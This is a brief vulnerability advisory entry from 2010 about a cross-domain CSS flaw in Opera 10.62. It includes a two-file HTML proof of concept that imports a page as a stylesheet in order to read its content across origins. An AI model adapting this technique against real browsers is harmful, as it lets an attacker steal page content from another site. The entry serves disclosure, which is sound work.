Opera Web Browser v10.62 (CSS) Cross Domain Vulnerability

2010-09-24T00:00:00
ID SECURITYVULNS:DOC:24790
Type securityvulns
Reporter Securityvulns
Modified 2010-09-24T00:00:00

Description

Proof Of Concept:

1.html: <body> {}body{DOM: Cross Domain Vulnerability

2.html: <style> @import url("1.html"); </style> <script> setTimeout(function(){ var s = document.body.currentStyle.DOM; alert(s); },0); </script>

Vulnerable: Opera 10.62

By: Securitylab.ir Original Advisory: http://Securitylab.ir/Advisories